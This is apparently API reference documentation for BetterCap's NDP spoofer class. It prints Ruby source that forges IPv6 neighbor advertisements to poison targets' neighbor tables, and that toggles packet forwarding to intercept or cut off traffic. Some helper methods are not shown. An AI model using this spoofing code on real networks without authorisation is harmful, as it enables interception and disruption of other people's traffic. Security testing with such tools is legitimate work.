Class: BetterCap::Spoofers::Ndp

Inherits:

Base

Object
Base
BetterCap::Spoofers::Ndp

show all

Defined in:: lib/bettercap/spoofers/ndp.rb

Overview

This class is responsible of performing NDP spoofing on the network.

Instance Method Summary collapse

#initialize ⇒ Ndp constructor

Initialize the BetterCap::Spoofers::NDP object.
#send_spoofed_packet(saddr, smac, daddr, dmac) ⇒ Object

Send a spoofed NDP reply to the target identified by the daddr IP address and dmac MAC address, spoofing the saddr IP address and smac MAC address as the source device.
#start ⇒ Object

Start the NDP spoofing.
#stop ⇒ Object

Stop the NDP spoofing, reset firewall state and restore targets IPv6 table.

Methods inherited from Base

available, get_by_name, inherited

Constructor Details

#initialize ⇒ `Ndp`

Initialize the BetterCap::Spoofers::NDP object.

# File 'lib/bettercap/spoofers/ndp.rb', line 8

def initialize
  @ctx          = Context.get
  @forwarding   = @ctx.firewall.ipv6_forwarding_enabled?
  @spoof_thread = nil
  @sniff_thread = nil
  @capture      = nil
  @running      = false

  update_gateway!
end

Instance Method Details

#send_spoofed_packet(saddr, smac, daddr, dmac) ⇒ `Object`

Send a spoofed NDP reply to the target identified by the daddr IP address and dmac MAC address, spoofing the saddr IP address and smac MAC address as the source device.

# File 'lib/bettercap/spoofers/ndp.rb', line 22

def send_spoofed_packet( saddr, smac, daddr, dmac )
  pkt = PacketFu::NDPPacket.new
  pkt.eth_saddr = smac
  pkt.eth_daddr = dmac
  pkt.eth_proto = 0x86dd

  pkt.ipv6_saddr = saddr
  pkt.ipv6_daddr = daddr
  pkt.ipv6_recalc

  if @ctx.gateway.ip == daddr
    pkt.ndp_set_flags = "001"
  else
    pkt.ndp_set_flags = "111"
  end

  pkt.ndp_type = 136
  pkt.ndp_taddr = saddr
  pkt.ndp_opt_type = 2
  pkt.ndp_opt_len = 1
  pkt.ndp_lladdr = smac

  pkt.ndp_recalc

  @ctx.packets.push(pkt)
end

#start ⇒ `Object`

Start the NDP spoofing.

# File 'lib/bettercap/spoofers/ndp.rb', line 50

def start
  Logger.debug "Starting NDP spoofer ( #{@ctx.options.spoof.half_duplex ? 'Half' : 'Full'} Duplex ) ..."

  stop() if @running
  @running = true

  if @ctx.options.spoof.kill
    Logger.warn "Disabling packet forwarding."
    @ctx.firewall.enable_ipv6_forwarding(false) if @forwarding
  else
    @ctx.firewall.enable_ipv6_forwarding(true) unless @forwarding
  end

  @sniff_thread = Thread.new { ndp_watcher }
  @spoof_thread = Thread.new { ndp_spoofer }
end

#stop ⇒ `Object`

Stop the NDP spoofing, reset firewall state and restore targets IPv6 table.

# File 'lib/bettercap/spoofers/ndp.rb', line 68

def stop
  raise 'NDP spoofer is not running' unless @running

  Logger.debug 'Stopping NDP spoofer ...'

  @running = false
  begin
    @spoof_thread.exit
  rescue
  end

  Logger.debug "Restoring IPv6 table of #{@ctx.targets.size} targets ..."

  @ctx.targets.each do |target|
    if target.spoofable?
      5.times do
        spoof(target, true)
        sleep 0.3
      end
    end
  end

  Logger.debug "Resetting packet forwarding to #{@forwarding} ..."

  @ctx.firewall.enable_forwarding( @forwarding )
end